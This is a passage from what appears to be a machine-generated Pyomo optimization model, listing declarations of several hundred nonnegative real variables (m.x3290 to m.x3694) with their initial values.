m.x3290 = Var(within=Reals,bounds=(0,None),initialize=5.55302)
m.x3291 = Var(within=Reals,bounds=(0,None),initialize=0.280683)
m.x3292 = Var(within=Reals,bounds=(0,None),initialize=0.0106)
m.x3293 = Var(within=Reals,bounds=(0,None),initialize=131.63247)
m.x3294 = Var(within=Reals,bounds=(0,None),initialize=0.161086794709578)
m.x3295 = Var(within=Reals,bounds=(0,None),initialize=0.300483205290422)
m.x3296 = Var(within=Reals,bounds=(0,None),initialize=0.01731)
m.x3297 = Var(within=Reals,bounds=(0,None),initialize=0.001695)
m.x3298 = Var(within=Reals,bounds=(0,None),initialize=0.001493)
m.x3299 = Var(within=Reals,bounds=(0,None),initialize=0.012768)
m.x3300 = Var(within=Reals,bounds=(0,None),initialize=0.008223)
m.x3301 = Var(within=Reals,bounds=(0,None),initialize=0.0034589905)
m.x3302 = Var(within=Reals,bounds=(0,None),initialize=0.0019964256)
m.x3303 = Var(within=Reals,bounds=(0,None),initialize=0.084689)
m.x3304 = Var(within=Reals,bounds=(0,None),initialize=0.172748)
m.x3305 = Var(within=Reals,bounds=(0,None),initialize=0.06891898911345)
m.x3306 = Var(within=Reals,bounds=(0,None),initialize=26.63323)
m.x3307 = Var(within=Reals,bounds=(0,None),initialize=0.0314865629844971)
m.x3308 = Var(within=Reals,bounds=(0,None),initialize=0.562567722615503)
m.x3309 = Var(within=Reals,bounds=(0,None),initialize=0.011236452)
m.x3310 = Var(within=Reals,bounds=(0,None),initialize=0.00148382736)
m.x3311 = Var(within=Reals,bounds=(0,None),initialize=0.0026321004)
m.x3312 = Var(within=Reals,bounds=(0,None),initialize=0.02372430612)
m.x3313 = Var(within=Reals,bounds=(0,None),initialize=0.0677917)
m.x3314 = Var(within=Reals,bounds=(0,None),initialize=0.1027134852)
m.x3315 = Var(within=Reals,bounds=(0,None),initialize=10.7249932546949)
m.x3316 = Var(within=Reals,bounds=(0,None),initialize=0.354066237714111)
m.x3317 = Var(within=Reals,bounds=(0,None),initialize=0.977945261428418)
m.x3318 = Var(within=Reals,bounds=(0,None),initialize=0.237895163697734)
m.x3319 = Var(within=Reals,bounds=(0,None),initialize=1.28431304598073)
m.x3320 = Var(within=Reals,bounds=(0,None),initialize=1.1230197215671)
m.x3321 = Var(within=Reals,bounds=(0,None),initialize=0.399133414040633)
m.x3322 = Var(within=Reals,bounds=(0,None),initialize=0.276762407270882)
m.x3323 = Var(within=Reals,bounds=(0,None),initialize=0.357141819517182)
m.x3324 = Var(within=Reals,bounds=(0,None),initialize=0.0205793699376)
m.x3325 = Var(within=Reals,bounds=(0,None),initialize=0.023514000184336)
m.x3326 = Var(within=Reals,bounds=(0,None),initialize=0.641428446778352)
m.x3327 = Var(within=Reals,bounds=(0,None),initialize=0.391563438577859)
m.x3328 = Var(within=Reals,bounds=(0,None),initialize=1.32352135926)
m.x3329 = Var(within=Reals,bounds=(0,None),initialize=0.10898811796)
m.x3330 = Var(within=Reals,bounds=(0,None),initialize=2.00171465752354)
m.x3331 = Var(within=Reals,bounds=(0,None),initialize=1.42705775633403)
m.x3332 = Var(within=Reals,bounds=(0,None),initialize=0.141836153011099)
m.x3333 = Var(within=Reals,bounds=(0,None),initialize=1.74531606494077)
m.x3334 = Var(within=Reals,bounds=(0,None),initialize=1.07369440932)
m.x3335 = Var(within=Reals,bounds=(0,None),initialize=1.13322)
m.x3336 = Var(within=Reals,bounds=(0,None),initialize=2.2952938302)
m.x3337 = Var(within=Reals,bounds=(0,None),initialize=3.622989007008)
m.x3338 = Var(within=Reals,bounds=(0,None),initialize=3.25505268363868)
m.x3339 = Var(within=Reals,bounds=(0,None),initialize=0.143848618445512)
m.x3340 = Var(within=Reals,bounds=(0,None),initialize=0.17836272436)
m.x3341 = Var(within=Reals,bounds=(0,None),initialize=0.60586833934)
m.x3342 = Var(within=Reals,bounds=(0,None),initialize=0.478299127728)
m.x3343 = Var(within=Reals,bounds=(0,None),initialize=0.896707113288)
m.x3344 = Var(within=Reals,bounds=(0,None),initialize=0.055228392972)
m.x3345 = Var(within=Reals,bounds=(0,None),initialize=0.855032245)
m.x3346 = Var(within=Reals,bounds=(0,None),initialize=0.09590465706)
m.x3347 = Var(within=Reals,bounds=(0,None),initialize=0.0187605331287052)
m.x3348 = Var(within=Reals,bounds=(0,None),initialize=0.233624624229944)
m.x3349 = Var(within=Reals,bounds=(0,None),initialize=0.599863450087462)
m.x3350 = Var(within=Reals,bounds=(0,None),initialize=0.551121839365814)
m.x3351 = Var(within=Reals,bounds=(0,None),initialize=0.0491035599346815)
m.x3352 = Var(within=Reals,bounds=(0,None),initialize=0.606128033615327)
m.x3353 = Var(within=Reals,bounds=(0,None),initialize=0.0208097555946574)
m.x3354 = Var(within=Reals,bounds=(0,None),initialize=0.381563673676899)
m.x3355 = Var(within=Reals,bounds=(0,None),initialize=0.575862486822612)
m.x3356 = Var(within=Reals,bounds=(0,None),initialize=0.995759299388352)
m.x3357 = Var(within=Reals,bounds=(0,None),initialize=2.00421635138841)
m.x3358 = Var(within=Reals,bounds=(0,None),initialize=4.53389097975563)
m.x3359 = Var(within=Reals,bounds=(0,None),initialize=8.21651955558519)
m.x3360 = Var(within=Reals,bounds=(0,None),initialize=15.3266823444148)
m.x3361 = Var(within=Reals,bounds=(0,None),initialize=1.1634984)
m.x3362 = Var(within=Reals,bounds=(0,None),initialize=2.3508252)
m.x3363 = Var(within=Reals,bounds=(0,None),initialize=4.1273026)
m.x3364 = Var(within=Reals,bounds=(0,None),initialize=12.894104)
m.x3365 = Var(within=Reals,bounds=(0,None),initialize=2.9326006666)
m.x3366 = Var(within=Reals,bounds=(0,None),initialize=1.7676265)
m.x3367 = Var(within=Reals,bounds=(0,None),initialize=28.0409807)
m.x3368 = Var(within=Reals,bounds=(0,None),initialize=32.4025769)
m.x3369 = Var(within=Reals,bounds=(0,None),initialize=14.9767481725)
m.x3370 = Var(within=Reals,bounds=(0,None),initialize=1.8235717)
m.x3371 = Var(within=Reals,bounds=(0,None),initialize=3.029659991371)
m.x3372 = Var(within=Reals,bounds=(0,None),initialize=0.655040914724)
m.x3373 = Var(within=Reals,bounds=(0,None),initialize=1.341728223446)
m.x3374 = Var(within=Reals,bounds=(0,None),initialize=0.282366)
m.x3375 = Var(within=Reals,bounds=(0,None),initialize=0.2353596875)
m.x3376 = Var(within=Reals,bounds=(0,None),initialize=3.430553717045)
m.x3377 = Var(within=Reals,bounds=(0,None),initialize=1.983273874692)
m.x3378 = Var(within=Reals,bounds=(0,None),initialize=0.0587329224)
m.x3379 = Var(within=Reals,bounds=(0,None),initialize=2.31148537683)
m.x3380 = Var(within=Reals,bounds=(0,None),initialize=0.61094580515)
m.x3381 = Var(within=Reals,bounds=(0,None),initialize=1.71163881484265)
m.x3382 = Var(within=Reals,bounds=(0,None),initialize=0.2543243778)
m.x3383 = Var(within=Reals,bounds=(0,None),initialize=0.43768)
m.x3384 = Var(within=Reals,bounds=(0,None),initialize=0.436258071190445)
m.x3385 = Var(within=Reals,bounds=(0,None),initialize=0.709919567926242)
m.x3386 = Var(within=Reals,bounds=(0,None),initialize=0.186974051527342)
m.x3387 = Var(within=Reals,bounds=(0,None),initialize=1.37178405850488)
m.x3388 = Var(within=Reals,bounds=(0,None),initialize=4.449)
m.x3389 = Var(within=Reals,bounds=(0,None),initialize=6.551)
m.x3390 = Var(within=Reals,bounds=(0,None),initialize=1.17143)
m.x3391 = Var(within=Reals,bounds=(0,None),initialize=3.140964)
m.x3392 = Var(within=Reals,bounds=(0,None),initialize=24.834424)
m.x3393 = Var(within=Reals,bounds=(0,None),initialize=16.008173)
m.x3394 = Var(within=Reals,bounds=(0,None),initialize=6.123132)
m.x3395 = Var(within=Reals,bounds=(0,None),initialize=4.114154)
m.x3396 = Var(within=Reals,bounds=(0,None),initialize=16.7945992)
m.x3397 = Var(within=Reals,bounds=(0,None),initialize=1.1)
m.x3398 = Var(within=Reals,bounds=(0,None),initialize=1.77719528887159)
m.x3399 = Var(within=Reals,bounds=(0,None),initialize=3.31509071112841)
m.x3400 = Var(within=Reals,bounds=(0,None),initialize=0.2350441)
m.x3401 = Var(within=Reals,bounds=(0,None),initialize=0.4856054)
m.x3402 = Var(within=Reals,bounds=(0,None),initialize=0.8834335)
m.x3403 = Var(within=Reals,bounds=(0,None),initialize=5.5742547)
m.x3404 = Var(within=Reals,bounds=(0,None),initialize=3.6181597)
m.x3405 = Var(within=Reals,bounds=(0,None),initialize=0.2765549)
m.x3406 = Var(within=Reals,bounds=(0,None),initialize=0.7337913)
m.x3407 = Var(within=Reals,bounds=(0,None),initialize=4.7583075)
m.x3408 = Var(within=Reals,bounds=(0,None),initialize=4.9098262964)
m.x3409 = Var(within=Reals,bounds=(0,None),initialize=0.2084190828)
m.x3410 = Var(within=Reals,bounds=(0,None),initialize=1.722020213488)
m.x3411 = Var(within=Reals,bounds=(0,None),initialize=0.331134977386)
m.x3412 = Var(within=Reals,bounds=(0,None),initialize=1.50444212413)
m.x3413 = Var(within=Reals,bounds=(0,None),initialize=0.09968588)
m.x3414 = Var(within=Reals,bounds=(0,None),initialize=0.15735262125)
m.x3415 = Var(within=Reals,bounds=(0,None),initialize=0.79973663622)
m.x3416 = Var(within=Reals,bounds=(0,None),initialize=1.120913215312)
m.x3417 = Var(within=Reals,bounds=(0,None),initialize=0.0799071031)
m.x3418 = Var(within=Reals,bounds=(0,None),initialize=0.131325808736)
m.x3419 = Var(within=Reals,bounds=(0,None),initialize=0.649921205615)
m.x3420 = Var(within=Reals,bounds=(0,None),initialize=1.03540119942397)
m.x3421 = Var(within=Reals,bounds=(0,None),initialize=0.8752106812)
m.x3422 = Var(within=Reals,bounds=(0,None),initialize=0.4726244)
m.x3423 = Var(within=Reals,bounds=(0,None),initialize=1.13905292404507)
m.x3424 = Var(within=Reals,bounds=(0,None),initialize=0.418032939964254)
m.x3425 = Var(within=Reals,bounds=(0,None),initialize=0.200518856890342)
m.x3426 = Var(within=Reals,bounds=(0,None),initialize=1.20787067442792)
m.x3427 = Var(within=Reals,bounds=(0,None),initialize=3.2961121)
m.x3428 = Var(within=Reals,bounds=(0,None),initialize=4.3163451)
m.x3429 = Var(within=Reals,bounds=(0,None),initialize=1.154730339)
m.x3430 = Var(within=Reals,bounds=(0,None),initialize=0.8358781)
m.x3431 = Var(within=Reals,bounds=(0,None),initialize=3.22470912242201)
m.x3432 = Var(within=Reals,bounds=(0,None),initialize=9.67579079021325)
m.x3433 = Var(within=Reals,bounds=(0,None),initialize=0.003039)
m.x3434 = Var(within=Reals,bounds=(0,None),initialize=0.070398)
m.x3435 = Var(within=Reals,bounds=(0,None),initialize=0.180143)
m.x3436 = Var(within=Reals,bounds=(0,None),initialize=1.181778)
m.x3437 = Var(within=Reals,bounds=(0,None),initialize=10.061735312)
m.x3438 = Var(within=Reals,bounds=(0,None),initialize=2.0312236)
m.x3439 = Var(within=Reals,bounds=(0,None),initialize=0.173125696)
m.x3440 = Var(within=Reals,bounds=(0,None),initialize=0.147088)
m.x3441 = Var(within=Reals,bounds=(0,None),initialize=0.182582283660864)
m.x3442 = Var(within=Reals,bounds=(0,None),initialize=2.50040598522118)
m.x3443 = Var(within=Reals,bounds=(0,None),initialize=9.47223574437838)
m.x3444 = Var(within=Reals,bounds=(0,None),initialize=14.6233334839817)
m.x3445 = Var(within=Reals,bounds=(0,None),initialize=1.02943687585272)
m.x3446 = Var(within=Reals,bounds=(0,None),initialize=12.7072365042724)
m.x3447 = Var(within=Reals,bounds=(0,None),initialize=0.436268364556851)
m.x3448 = Var(within=Reals,bounds=(0,None),initialize=7.99933277121532)
m.x3449 = Var(within=Reals,bounds=(0,None),initialize=5.95244996138264)
m.x3450 = Var(within=Reals,bounds=(0,None),initialize=8.95573000178086)
m.x3451 = Var(within=Reals,bounds=(0,None),initialize=19.6471932757303)
m.x3452 = Var(within=Reals,bounds=(0,None),initialize=76.2019652705837)
m.x3453 = Var(within=Reals,bounds=(0,None),initialize=0.530955)
m.x3454 = Var(within=Reals,bounds=(0,None),initialize=0.30826)
m.x3455 = Var(within=Reals,bounds=(0,None),initialize=0.108523)
m.x3456 = Var(within=Reals,bounds=(0,None),initialize=0.0337874)
m.x3457 = Var(within=Reals,bounds=(0,None),initialize=0.00260588591562475)
m.x3458 = Var(within=Reals,bounds=(0,None),initialize=0.00267812)
m.x3459 = Var(within=Reals,bounds=(0,None),initialize=12.8848947512802)
m.x3460 = Var(within=Reals,bounds=(0,None),initialize=0.4843398044115)
m.x3461 = Var(within=Reals,bounds=(0,None),initialize=0.615658)
m.x3462 = Var(within=Reals,bounds=(0,None),initialize=0.018547)
m.x3463 = Var(within=Reals,bounds=(0,None),initialize=0.0173972)
m.x3464 = Var(within=Reals,bounds=(0,None),initialize=4.9706658)
m.x3465 = Var(within=Reals,bounds=(0,None),initialize=0.2990025)
m.x3466 = Var(within=Reals,bounds=(0,None),initialize=0.4495)
m.x3467 = Var(within=Reals,bounds=(0,None),initialize=0.318241)
m.x3468 = Var(within=Reals,bounds=(0,None),initialize=0.1926084291101)
m.x3469 = Var(within=Reals,bounds=(0,None),initialize=2.92131415863407)
m.x3470 = Var(within=Reals,bounds=(0,None),initialize=7.67695140142887)
m.x3471 = Var(within=Reals,bounds=(0,None),initialize=11.8627377626878)
m.x3472 = Var(within=Reals,bounds=(0,None),initialize=0.535845077135325)
m.x3473 = Var(within=Reals,bounds=(0,None),initialize=6.61440277158175)
m.x3474 = Var(within=Reals,bounds=(0,None),initialize=0.227087508657611)
m.x3475 = Var(within=Reals,bounds=(0,None),initialize=4.16383285499893)
m.x3476 = Var(within=Reals,bounds=(0,None),initialize=4.10388431300999)
m.x3477 = Var(within=Reals,bounds=(0,None),initialize=7.68163730911756)
m.x3478 = Var(within=Reals,bounds=(0,None),initialize=12.4291774948124)
m.x3479 = Var(within=Reals,bounds=(0,None),initialize=39.3098501150966)
m.x3480 = Var(within=Reals,bounds=(0,None),initialize=0.31446)
m.x3481 = Var(within=Reals,bounds=(0,None),initialize=0.00456)
m.x3482 = Var(within=Reals,bounds=(0,None),initialize=0.001)
m.x3483 = Var(within=Reals,bounds=(0,None),initialize=0.022055001518853)
m.x3484 = Var(within=Reals,bounds=(0,None),initialize=0.0102172814)
m.x3485 = Var(within=Reals,bounds=(0,None),initialize=0.002588996999688)
m.x3486 = Var(within=Reals,bounds=(0,None),initialize=0.001567887517)
m.x3487 = Var(within=Reals,bounds=(0,None),initialize=0.003279)
m.x3488 = Var(within=Reals,bounds=(0,None),initialize=0.006749)
m.x3489 = Var(within=Reals,bounds=(0,None),initialize=0.0298395196)
m.x3490 = Var(within=Reals,bounds=(0,None),initialize=0.0046291845)
m.x3491 = Var(within=Reals,bounds=(0,None),initialize=0.0299948623155)
m.x3492 = Var(within=Reals,bounds=(0,None),initialize=0.0497033595763023)
m.x3493 = Var(within=Reals,bounds=(0,None),initialize=0.451854745815614)
m.x3494 = Var(within=Reals,bounds=(0,None),initialize=1.54441175309256)
m.x3495 = Var(within=Reals,bounds=(0,None),initialize=3.0340576305907)
m.x3496 = Var(within=Reals,bounds=(0,None),initialize=0.109557531268913)
m.x3497 = Var(within=Reals,bounds=(0,None),initialize=1.35236408692385)
m.x3498 = Var(within=Reals,bounds=(0,None),initialize=0.046429738542233)
m.x3499 = Var(within=Reals,bounds=(0,None),initialize=0.851326750352637)
m.x3500 = Var(within=Reals,bounds=(0,None),initialize=0.5657680078358)
m.x3501 = Var(within=Reals,bounds=(0,None),initialize=0.75985437249865)
m.x3502 = Var(within=Reals,bounds=(0,None),initialize=1.72819031068099)
m.x3503 = Var(within=Reals,bounds=(0,None),initialize=2.82939885233739)
m.x3504 = Var(within=Reals,bounds=(0,None),initialize=6.456)
m.x3505 = Var(within=Reals,bounds=(0,None),initialize=0.004184)
m.x3506 = Var(within=Reals,bounds=(0,None),initialize=0.0312685866)
m.x3507 = Var(within=Reals,bounds=(0,None),initialize=0.0075675565)
m.x3508 = Var(within=Reals,bounds=(0,None),initialize=0.0165008901462231)
m.x3509 = Var(within=Reals,bounds=(0,None),initialize=0.237220417002714)
m.x3510 = Var(within=Reals,bounds=(0,None),initialize=0.927009726921396)
m.x3511 = Var(within=Reals,bounds=(0,None),initialize=1.80731957509853)
m.x3512 = Var(within=Reals,bounds=(0,None),initialize=0.0948822047646439)
m.x3513 = Var(within=Reals,bounds=(0,None),initialize=1.17121374245742)
m.x3514 = Var(within=Reals,bounds=(0,None),initialize=0.0402104347232862)
m.x3515 = Var(within=Reals,bounds=(0,None),initialize=0.737290792454153)
m.x3516 = Var(within=Reals,bounds=(0,None),initialize=0.349105303471494)
m.x3517 = Var(within=Reals,bounds=(0,None),initialize=0.973719815057462)
m.x3518 = Var(within=Reals,bounds=(0,None),initialize=2.34331964170002)
m.x3519 = Var(within=Reals,bounds=(0,None),initialize=6.18221953303095)
m.x3520 = Var(within=Reals,bounds=(0,None),initialize=17.9695)
m.x3521 = Var(within=Reals,bounds=(0,None),initialize=0.0239202914171079)
m.x3522 = Var(within=Reals,bounds=(0,None),initialize=0.0446197085828921)
m.x3523 = Var(within=Reals,bounds=(0,None),initialize=0.012394)
m.x3524 = Var(within=Reals,bounds=(0,None),initialize=0.014524)
m.x3525 = Var(within=Reals,bounds=(0,None),initialize=0.069943)
m.x3526 = Var(within=Reals,bounds=(0,None),initialize=0.036823)
m.x3527 = Var(within=Reals,bounds=(0,None),initialize=0.018544)
m.x3528 = Var(within=Reals,bounds=(0,None),initialize=0.004785)
m.x3529 = Var(within=Reals,bounds=(0,None),initialize=0.022428)
m.x3530 = Var(within=Reals,bounds=(0,None),initialize=0.755298)
m.x3531 = Var(within=Reals,bounds=(0,None),initialize=0.009954)
m.x3532 = Var(within=Reals,bounds=(0,None),initialize=0.00748912042040259)
m.x3533 = Var(within=Reals,bounds=(0,None),initialize=0.218102647885731)
m.x3534 = Var(within=Reals,bounds=(0,None),initialize=0.055768)
m.x3535 = Var(within=Reals,bounds=(0,None),initialize=0.0519120104496)
m.x3536 = Var(within=Reals,bounds=(0,None),initialize=0.075615)
m.x3537 = Var(within=Reals,bounds=(0,None),initialize=0.023368312)
m.x3538 = Var(within=Reals,bounds=(0,None),initialize=0.019026688)
m.x3539 = Var(within=Reals,bounds=(0,None),initialize=0.0538976237392429)
m.x3540 = Var(within=Reals,bounds=(0,None),initialize=0.00211816)
m.x3541 = Var(within=Reals,bounds=(0,None),initialize=0.0040242)
m.x3542 = Var(within=Reals,bounds=(0,None),initialize=0.053471138)
m.x3543 = Var(within=Reals,bounds=(0,None),initialize=0.145386)
m.x3544 = Var(within=Reals,bounds=(0,None),initialize=0.034925)
m.x3545 = Var(within=Reals,bounds=(0,None),initialize=0.08915661396)
m.x3546 = Var(within=Reals,bounds=(0,None),initialize=0.006901)
m.x3547 = Var(within=Reals,bounds=(0,None),initialize=0.112332)
m.x3548 = Var(within=Reals,bounds=(0,None),initialize=0.018412)
m.x3549 = Var(within=Reals,bounds=(0,None),initialize=0.5132388)
m.x3550 = Var(within=Reals,bounds=(0,None),initialize=0.0978)
m.x3551 = Var(within=Reals,bounds=(0,None),initialize=4.44261325746357)
m.x3552 = Var(within=Reals,bounds=(0,None),initialize=3.5218822311666)
m.x3553 = Var(within=Reals,bounds=(0,None),initialize=0.001508)
m.x3554 = Var(within=Reals,bounds=(0,None),initialize=0.108147)
m.x3555 = Var(within=Reals,bounds=(0,None),initialize=0.701418)
m.x3556 = Var(within=Reals,bounds=(0,None),initialize=1.1842192)
m.x3557 = Var(within=Reals,bounds=(0,None),initialize=0.1809147)
m.x3558 = Var(within=Reals,bounds=(0,None),initialize=0.19159)
m.x3559 = Var(within=Reals,bounds=(0,None),initialize=0.00236424837064668)
m.x3560 = Var(within=Reals,bounds=(0,None),initialize=0.0255270002350324)
m.x3561 = Var(within=Reals,bounds=(0,None),initialize=0.055863743702221)
m.x3562 = Var(within=Reals,bounds=(0,None),initialize=0.0725361924450216)
m.x3563 = Var(within=Reals,bounds=(0,None),initialize=0.00424264398213649)
m.x3564 = Var(within=Reals,bounds=(0,None),initialize=0.052370652100236)
m.x3565 = Var(within=Reals,bounds=(0,None),initialize=0.00179800373864639)
m.x3566 = Var(within=Reals,bounds=(0,None),initialize=0.0329678505200152)
m.x3567 = Var(within=Reals,bounds=(0,None),initialize=0.0243002279601108)
m.x3568 = Var(within=Reals,bounds=(0,None),initialize=0.0389316916125456)
m.x3569 = Var(within=Reals,bounds=(0,None),initialize=0.0687485166474724)
m.x3570 = Var(within=Reals,bounds=(0,None),initialize=0.168504461069753)
m.x3571 = Var(within=Reals,bounds=(0,None),initialize=32.71194)
m.x3572 = Var(within=Reals,bounds=(0,None),initialize=0.0364794547416)
m.x3573 = Var(within=Reals,bounds=(0,None),initialize=0.114695080872)
m.x3574 = Var(within=Reals,bounds=(0,None),initialize=0.0250011873012)
m.x3575 = Var(within=Reals,bounds=(0,None),initialize=0.055674559526)
m.x3576 = Var(within=Reals,bounds=(0,None),initialize=0.0434456960759)
m.x3577 = Var(within=Reals,bounds=(0,None),initialize=0.0109854143096)
m.x3578 = Var(within=Reals,bounds=(0,None),initialize=0.1255851835848)
m.x3579 = Var(within=Reals,bounds=(0,None),initialize=0.003492020854)
m.x3580 = Var(within=Reals,bounds=(0,None),initialize=0.372079714324854)
m.x3581 = Var(within=Reals,bounds=(0,None),initialize=0.00909648034732984)
m.x3582 = Var(within=Reals,bounds=(0,None),initialize=1.21668926019416)
m.x3583 = Var(within=Reals,bounds=(0,None),initialize=0.3519171043248)
m.x3584 = Var(within=Reals,bounds=(0,None),initialize=0.768547504199721)
m.x3585 = Var(within=Reals,bounds=(0,None),initialize=0.3624705242892)
m.x3586 = Var(within=Reals,bounds=(0,None),initialize=0.122508840855478)
m.x3587 = Var(within=Reals,bounds=(0,None),initialize=0.0963431211603174)
m.x3588 = Var(within=Reals,bounds=(0,None),initialize=0.120429209453612)
m.x3589 = Var(within=Reals,bounds=(0,None),initialize=0.004994809434)
m.x3590 = Var(within=Reals,bounds=(0,None),initialize=0.021482422992992)
m.x3591 = Var(within=Reals,bounds=(0,None),initialize=0.16203540438494)
m.x3592 = Var(within=Reals,bounds=(0,None),initialize=0.356284109966525)
m.x3593 = Var(within=Reals,bounds=(0,None),initialize=1.097192)
m.x3594 = Var(within=Reals,bounds=(0,None),initialize=2.79242622409)
m.x3595 = Var(within=Reals,bounds=(0,None),initialize=0.0346158713223266)
m.x3596 = Var(within=Reals,bounds=(0,None),initialize=0.636108536860527)
m.x3597 = Var(within=Reals,bounds=(0,None),initialize=0.363589906528056)
m.x3598 = Var(within=Reals,bounds=(0,None),initialize=0.143636635873144)
m.x3599 = Var(within=Reals,bounds=(0,None),initialize=0.017268)
m.x3600 = Var(within=Reals,bounds=(0,None),initialize=0.6010422)
m.x3601 = Var(within=Reals,bounds=(0,None),initialize=0.127222)
m.x3602 = Var(within=Reals,bounds=(0,None),initialize=6.76394375514328)
m.x3603 = Var(within=Reals,bounds=(0,None),initialize=0.43183256254565)
m.x3604 = Var(within=Reals,bounds=(0,None),initialize=2.2967545773032)
m.x3605 = Var(within=Reals,bounds=(0,None),initialize=0.1903051826796)
m.x3606 = Var(within=Reals,bounds=(0,None),initialize=0.1195485574624)
m.x3607 = Var(within=Reals,bounds=(0,None),initialize=0.9592616)
m.x3608 = Var(within=Reals,bounds=(0,None),initialize=0.42921901161436)
m.x3609 = Var(within=Reals,bounds=(0,None),initialize=0.01916)
m.x3610 = Var(within=Reals,bounds=(0,None),initialize=0.0449890161068)
m.x3611 = Var(within=Reals,bounds=(0,None),initialize=0.374946781244389)
m.x3612 = Var(within=Reals,bounds=(0,None),initialize=4.04833379258381)
m.x3613 = Var(within=Reals,bounds=(0,None),initialize=8.85944605036568)
m.x3614 = Var(within=Reals,bounds=(0,None),initialize=11.5035341543009)
m.x3615 = Var(within=Reals,bounds=(0,None),initialize=0.672842043508669)
m.x3616 = Var(within=Reals,bounds=(0,None),initialize=8.30547571923766)
m.x3617 = Var(within=Reals,bounds=(0,None),initialize=0.285145893655177)
m.x3618 = Var(within=Reals,bounds=(0,None),initialize=5.22838022878483)
m.x3619 = Var(within=Reals,bounds=(0,None),initialize=3.85377964949439)
m.x3620 = Var(within=Reals,bounds=(0,None),initialize=6.17418738223788)
m.x3621 = Var(within=Reals,bounds=(0,None),initialize=10.9028456368336)
m.x3622 = Var(within=Reals,bounds=(0,None),initialize=26.7231675351196)
m.x3623 = Var(within=Reals,bounds=(0,None),initialize=0.114123242694318)
m.x3624 = Var(within=Reals,bounds=(0,None),initialize=0.212879757305682)
m.x3625 = Var(within=Reals,bounds=(0,None),initialize=0.006718)
m.x3626 = Var(within=Reals,bounds=(0,None),initialize=0.029069)
m.x3627 = Var(within=Reals,bounds=(0,None),initialize=0.004653)
m.x3628 = Var(within=Reals,bounds=(0,None),initialize=0.010897)
m.x3629 = Var(within=Reals,bounds=(0,None),initialize=0.030875)
m.x3630 = Var(within=Reals,bounds=(0,None),initialize=0.005151)
m.x3631 = Var(within=Reals,bounds=(0,None),initialize=0.059278)
m.x3632 = Var(within=Reals,bounds=(0,None),initialize=0.001129)
m.x3633 = Var(within=Reals,bounds=(0,None),initialize=3.21853802155452)
m.x3634 = Var(within=Reals,bounds=(0,None),initialize=3.3177102062895)
m.x3635 = Var(within=Reals,bounds=(0,None),initialize=0.189208)
m.x3636 = Var(within=Reals,bounds=(0,None),initialize=0.00376)
m.x3637 = Var(within=Reals,bounds=(0,None),initialize=1.8557152)
m.x3638 = Var(within=Reals,bounds=(0,None),initialize=0.072623)
m.x3639 = Var(within=Reals,bounds=(0,None),initialize=0.176143011243206)
m.x3640 = Var(within=Reals,bounds=(0,None),initialize=1.90183178097095)
m.x3641 = Var(within=Reals,bounds=(0,None),initialize=4.16200267162979)
m.x3642 = Var(within=Reals,bounds=(0,None),initialize=5.40414599414021)
m.x3643 = Var(within=Reals,bounds=(0,None),initialize=0.316088654612027)
m.x3644 = Var(within=Reals,bounds=(0,None),initialize=3.90175773249352)
m.x3645 = Var(within=Reals,bounds=(0,None),initialize=0.13395622756212)
m.x3646 = Var(within=Reals,bounds=(0,None),initialize=2.45619560825709)
m.x3647 = Var(within=Reals,bounds=(0,None),initialize=1.81043386977972)
m.x3648 = Var(within=Reals,bounds=(0,None),initialize=2.90051818521502)
m.x3649 = Var(within=Reals,bounds=(0,None),initialize=5.12195372158686)
m.x3650 = Var(within=Reals,bounds=(0,None),initialize=12.5540461608192)
m.x3651 = Var(within=Reals,bounds=(0,None),initialize=0.00988469573267103)
m.x3652 = Var(within=Reals,bounds=(0,None),initialize=0.4188943026)
m.x3653 = Var(within=Reals,bounds=(0,None),initialize=0.089906)
m.x3654 = Var(within=Reals,bounds=(0,None),initialize=0.1787707)
m.x3655 = Var(within=Reals,bounds=(0,None),initialize=0.3390187)
m.x3656 = Var(within=Reals,bounds=(0,None),initialize=0.017159)
m.x3657 = Var(within=Reals,bounds=(0,None),initialize=0.100280815265476)
m.x3658 = Var(within=Reals,bounds=(0,None),initialize=0.852234305688922)
m.x3659 = Var(within=Reals,bounds=(0,None),initialize=1.92094528312345)
m.x3660 = Var(within=Reals,bounds=(0,None),initialize=1.7127032033681)
m.x3661 = Var(within=Reals,bounds=(0,None),initialize=0.233755968663716)
m.x3662 = Var(within=Reals,bounds=(0,None),initialize=2.88545363758672)
m.x3663 = Var(within=Reals,bounds=(0,None),initialize=0.0990641937805541)
m.x3664 = Var(within=Reals,bounds=(0,None),initialize=1.81642199192636)
m.x3665 = Var(within=Reals,bounds=(0,None),initialize=2.07473215243825)
m.x3666 = Var(within=Reals,bounds=(0,None),initialize=1.91162592490643)
m.x3667 = Var(within=Reals,bounds=(0,None),initialize=1.84992924143647)
m.x3668 = Var(within=Reals,bounds=(0,None),initialize=4.11017705440097)
m.x3669 = Var(within=Reals,bounds=(0,None),initialize=0.0541218520100628)
m.x3670 = Var(within=Reals,bounds=(0,None),initialize=0.0146068950761892)
m.x3671 = Var(within=Reals,bounds=(0,None),initialize=0.21417091934138)
m.x3672 = Var(within=Reals,bounds=(0,None),initialize=0.124584952)
m.x3673 = Var(within=Reals,bounds=(0,None),initialize=0.0510555356238)
m.x3674 = Var(within=Reals,bounds=(0,None),initialize=0.014994)
m.x3675 = Var(within=Reals,bounds=(0,None),initialize=0.004634102)
m.x3676 = Var(within=Reals,bounds=(0,None),initialize=0.003386198)
m.x3677 = Var(within=Reals,bounds=(0,None),initialize=0.135363925307153)
m.x3678 = Var(within=Reals,bounds=(0,None),initialize=0.00360256)
m.x3679 = Var(within=Reals,bounds=(0,None),initialize=0.032749852753)
m.x3680 = Var(within=Reals,bounds=(0,None),initialize=0.092624744)
m.x3681 = Var(within=Reals,bounds=(0,None),initialize=0.013136)
m.x3682 = Var(within=Reals,bounds=(0,None),initialize=0.01794005037)
m.x3683 = Var(within=Reals,bounds=(0,None),initialize=0.010893467)
m.x3684 = Var(within=Reals,bounds=(0,None),initialize=0.031529012)
m.x3685 = Var(within=Reals,bounds=(0,None),initialize=0.11253929393)
m.x3686 = Var(within=Reals,bounds=(0,None),initialize=0.071752464935)
m.x3687 = Var(within=Reals,bounds=(0,None),initialize=0.026149)
m.x3688 = Var(within=Reals,bounds=(0,None),initialize=0.005437)
m.x3689 = Var(within=Reals,bounds=(0,None),initialize=4.65713034758874)
m.x3690 = Var(within=Reals,bounds=(0,None),initialize=0.0665275418424)
m.x3691 = Var(within=Reals,bounds=(0,None),initialize=0.001212)
m.x3692 = Var(within=Reals,bounds=(0,None),initialize=0.068609)
m.x3693 = Var(within=Reals,bounds=(0,None),initialize=0.291576)
m.x3694 = Var(within=Reals,bounds=(0,None),initialize=2.121144)
